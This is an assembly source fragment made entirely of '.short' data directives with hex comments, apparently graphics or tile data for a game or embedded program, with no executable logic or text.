.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3840 ; 0xf00
.short 29336 ; 0x7298
.short 0 ; 0x0
.short 0 ; 0x0
.short 3584 ; 0xe00
.short 30832 ; 0x7870
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3854 ; 0xf0e
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 29298 ; 0x7272
.short 15 ; 0xf
.short 0 ; 0x0
.short 0 ; 0x0
.short 22130 ; 0x5672
.short 14 ; 0xe
.short 0 ; 0x0
.short 0 ; 0x0
.short 3950 ; 0xf6e
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3950 ; 0xf6e
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3950 ; 0xf6e
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3599 ; 0xe0f
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 36353 ; 0x8e01
.short 46171 ; 0xb45b
.short 23476 ; 0x5bb4
.short 46260 ; 0xb4b4
.short 36353 ; 0x8e01
.short 31657 ; 0x7ba9
.short 44411 ; 0xad7b
.short 31611 ; 0x7b7b
.short 43522 ; 0xaa02
.short 43401 ; 0xa989
.short 43177 ; 0xa8a9
.short 43433 ; 0xa9a9
.short 43536 ; 0xaa10
.short 36233 ; 0x8d89
.short 36237 ; 0x8d8d
.short 36237 ; 0x8d8d
.short 43536 ; 0xaa10
.short 36233 ; 0x8d89
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 35330 ; 0x8a02
.short 35209 ; 0x8989
.short 36237 ; 0x8d8d
.short 36237 ; 0x8d8d
.short 256 ; 0x100
.short 35726 ; 0x8b8e
.short 35723 ; 0x8b8b
.short 35723 ; 0x8b8b
.short 256 ; 0x100
.short 257 ; 0x101
.short 257 ; 0x101
.short 257 ; 0x101
.short 46260 ; 0xb4b4
.short 46260 ; 0xb4b4
.short 23220 ; 0x5ab4
.short 7081 ; 0x1ba9
.short 31611 ; 0x7b7b
.short 31611 ; 0x7b7b
.short 43387 ; 0xa97b
.short 2985 ; 0xba9
.short 43433 ; 0xa9a9
.short 43433 ; 0xa9a9
.short 43177 ; 0xa8a9
.short 937 ; 0x3a9
.short 36237 ; 0x8d8d
.short 36237 ; 0x8d8d
.short 42893 ; 0xa78d
.short 425 ; 0x1a9
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 425 ; 0x1a9
.short 36237 ; 0x8d8d
.short 36237 ; 0x8d8d
.short 42893 ; 0xa78d
.short 394 ; 0x18a
.short 35723 ; 0x8b8b
.short 35723 ; 0x8b8b
.short 43659 ; 0xaa8b
.short 1 ; 0x1
.short 257 ; 0x101
.short 257 ; 0x101
.short 257 ; 0x101
.short 1 ; 0x1
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 52483 ; 0xcd03
.short 52483 ; 0xcd03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 52429 ; 0xcccd
.short 51457 ; 0xc901
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 256 ; 0x100
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 256 ; 0x100
.short 56013 ; 0xdacd
.short 56026 ; 0xdada
.short 771 ; 0x303
.short 256 ; 0x100
.short 52370 ; 0xcc92
.short 52428 ; 0xcccc
.short 41933 ; 0xa3cd
.short 0 ; 0x0
.short 37377 ; 0x9201
.short 41377 ; 0xa1a1
.short 402 ; 0x192
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 1 ; 0x1
.short 986 ; 0x3da
.short 56013 ; 0xdacd
.short 52428 ; 0xcccc
.short 417 ; 0x1a1
.short 52698 ; 0xcdda
.short 52428 ; 0xcccc
.short 52684 ; 0xcdcc
.short 417 ; 0x1a1
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 973 ; 0x3cd
.short 402 ; 0x192
.short 56026 ; 0xdada
.short 55811 ; 0xda03
.short 41932 ; 0xa3cc
.short 1 ; 0x1
.short 771 ; 0x303
.short 52442 ; 0xccda
.short 41420 ; 0xa1cc
.short 1 ; 0x1
.short 52643 ; 0xcda3
.short 52428 ; 0xcccc
.short 37528 ; 0x9298
.short 1 ; 0x1
.short 37377 ; 0x9201
.short 41377 ; 0xa1a1
.short 402 ; 0x192
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3854 ; 0xf0e
.short 3855 ; 0xf0f
.short 3855 ; 0xf0f
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 39064 ; 0x9898
.short 39064 ; 0x9898
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 29304 ; 0x7278
.short 29298 ; 0x7272
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3854 ; 0xf0e
.short 14 ; 0xe
.short 0 ; 0x0
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 3696 ; 0xe70
.short 0 ; 0x0
.short 0 ; 0x0
.short 30037 ; 0x7555
.short 22136 ; 0x5678
.short 14 ; 0xe
.short 0 ; 0x0
.short 39064 ; 0x9898
.short 29304 ; 0x7278
.short 3670 ; 0xe56
.short 0 ; 0x0
.short 29298 ; 0x7272
.short 29298 ; 0x7272
.short 22130 ; 0x5672
.short 14 ; 0xe
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 1 ; 0x1
.short 256 ; 0x100
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 256 ; 0x100
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 259 ; 0x103
.short 0 ; 0x0
.short 49921 ; 0xc301
.short 53970 ; 0xd2d2
.short 53970 ; 0xd2d2
.short 256 ; 0x100
.short 50115 ; 0xc3c3
.short 50115 ; 0xc3c3
.short 50115 ; 0xc3c3
.short 256 ; 0x100
.short 50130 ; 0xc3d2
.short 50115 ; 0xc3c3
.short 50115 ; 0xc3c3
.short 256 ; 0x100
.short 50130 ; 0xc3d2
.short 50115 ; 0xc3c3
.short 50115 ; 0xc3c3
.short 49921 ; 0xc301
.short 50115 ; 0xc3c3
.short 50115 ; 0xc3c3
.short 50130 ; 0xc3d2
.short 53761 ; 0xd201
.short 50115 ; 0xc3c3
.short 53955 ; 0xd2c3
.short 46339 ; 0xb503
.short 53761 ; 0xd201
.short 50115 ; 0xc3c3
.short 53955 ; 0xd2c3
.short 46339 ; 0xb503
.short 769 ; 0x301
.short 771 ; 0x303
.short 1 ; 0x1
.short 0 ; 0x0
.short 53970 ; 0xd2d2
.short 46517 ; 0xb5b5
.short 322 ; 0x142
.short 0 ; 0x0
.short 50115 ; 0xc3c3
.short 46019 ; 0xb3c3
.short 17075 ; 0x42b3
.short 1 ; 0x1
.short 50115 ; 0xc3c3
.short 46019 ; 0xb3c3
.short 17331 ; 0x43b3
.short 1 ; 0x1
.short 50115 ; 0xc3c3
.short 46019 ; 0xb3c3
.short 17331 ; 0x43b3
.short 1 ; 0x1
.short 53955 ; 0xd2c3
.short 50115 ; 0xc3c3
.short 46003 ; 0xb3b3
.short 322 ; 0x142
.short 978 ; 0x3d2
.short 50101 ; 0xc3b5
.short 46003 ; 0xb3b3
.short 323 ; 0x143
.short 978 ; 0x3d2
.short 50101 ; 0xc3b5
.short 46003 ; 0xb3b3
.short 323 ; 0x143
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 19271 ; 0x4b47
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 19787 ; 0x4d4b
.short 20045 ; 0x4e4d
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 20043 ; 0x4e4b
.short 771 ; 0x303
.short 18247 ; 0x4747
.short 19787 ; 0x4d4b
.short 846 ; 0x34e
.short 56026 ; 0xdada
.short 19271 ; 0x4b47
.short 846 ; 0x34e
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 19783 ; 0x4d47
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 19783 ; 0x4d47
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 20043 ; 0x4e4b
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 846 ; 0x34e
.short 56026 ; 0xdada
.short 16858 ; 0x41da
.short 55873 ; 0xda41
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 55873 ; 0xda41
.short 56026 ; 0xdada
.short 771 ; 0x303
.short 19278 ; 0x4b4e
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 18251 ; 0x474b
.short 18247 ; 0x4747
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 19790 ; 0x4d4e
.short 18251 ; 0x474b
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 846 ; 0x34e
.short 19278 ; 0x4b4e
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55811 ; 0xda03
.short 19971 ; 0x4e03
.short 16858 ; 0x41da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 55873 ; 0xda41
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 18251 ; 0x474b
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 18253 ; 0x474d
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 18253 ; 0x474d
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 8775 ; 0x2247
.short 19278 ; 0x4b4e
.short 19787 ; 0x4d4b
.short 18251 ; 0x474b
.short 9031 ; 0x2347
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 29304 ; 0x7278
.short 29298 ; 0x7272
.short 0 ; 0x0
.short 29967 ; 0x750f
.short 29304 ; 0x7278
.short 29298 ; 0x7272
.short 0 ; 0x0
.short 3854 ; 0xf0e
.short 3855 ; 0xf0f
.short 3855 ; 0xf0f
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 29298 ; 0x7272
.short 29298 ; 0x7272
.short 22130 ; 0x5672
.short 14 ; 0xe
.short 29298 ; 0x7272
.short 29298 ; 0x7272
.short 3670 ; 0xe56
.short 0 ; 0x0
.short 28245 ; 0x6e55
.short 22130 ; 0x5672
.short 14 ; 0xe
.short 0 ; 0x0
.short 28175 ; 0x6e0f
.short 3670 ; 0xe56
.short 0 ; 0x0
.short 0 ; 0x0
.short 3854 ; 0xf0e
.short 14 ; 0xe
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 1 ; 0x1
.short 256 ; 0x100
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1 ; 0x1
.short 1 ; 0x1
.short 256 ; 0x100
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 53761 ; 0xd201
.short 50115 ; 0xc3c3
.short 53955 ; 0xd2c3
.short 46339 ; 0xb503
.short 49921 ; 0xc301
.short 50130 ; 0xc3d2
.short 50115 ; 0xc3c3
.short 46005 ; 0xb3b5
.short 46337 ; 0xb501
.short 53763 ; 0xd203
.short 50115 ; 0xc3c3
.short 53970 ; 0xd2d2
.short 256 ; 0x100
.short 50130 ; 0xc3d2
.short 53955 ; 0xd2c3
.short 771 ; 0x303
.short 256 ; 0x100
.short 50101 ; 0xc3b5
.short 978 ; 0x3d2
.short 53970 ; 0xd2d2
.short 256 ; 0x100
.short 45890 ; 0xb342
.short 46515 ; 0xb5b3
.short 17333 ; 0x43b5
.short 0 ; 0x0
.short 16897 ; 0x4201
.short 17219 ; 0x4343
.short 322 ; 0x142
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 1 ; 0x1
.short 978 ; 0x3d2
.short 50101 ; 0xc3b5
.short 46003 ; 0xb3b3
.short 323 ; 0x143
.short 46531 ; 0xb5c3
.short 46003 ; 0xb3b3
.short 46515 ; 0xb5b3
.short 324 ; 0x144
.short 53970 ; 0xd2d2
.short 50115 ; 0xc3c3
.short 949 ; 0x3b5
.short 322 ; 0x142
.short 771 ; 0x303
.short 50130 ; 0xc3d2
.short 45491 ; 0xb1b3
.short 1 ; 0x1
.short 53970 ; 0xd2d2
.short 46339 ; 0xb503
.short 17331 ; 0x43b3
.short 1 ; 0x1
.short 46403 ; 0xb543
.short 46005 ; 0xb3b5
.short 16925 ; 0x421d
.short 1 ; 0x1
.short 16897 ; 0x4201
.short 17219 ; 0x4343
.short 322 ; 0x142
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 410 ; 0x19a
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 769 ; 0x301
.short 50906 ; 0xc6da
.short 21702 ; 0x54c6
.short 259 ; 0x103
.short 55809 ; 0xda01
.short 966 ; 0x3c6
.short 50691 ; 0xc603
.short 852 ; 0x354
.short 55809 ; 0xda01
.short 39427 ; 0x9a03
.short 922 ; 0x39a
.short 852 ; 0x354
.short 50689 ; 0xc601
.short 771 ; 0x303
.short 771 ; 0x303
.short 852 ; 0x354
.short 18247 ; 0x4747
.short 19271 ; 0x4b47
.short 846 ; 0x34e
.short 771 ; 0x303
.short 18247 ; 0x4747
.short 20043 ; 0x4e4b
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 18247 ; 0x4747
.short 845 ; 0x34d
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 19787 ; 0x4d4b
.short 55886 ; 0xda4e
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 846 ; 0x34e
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 846 ; 0x34e
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
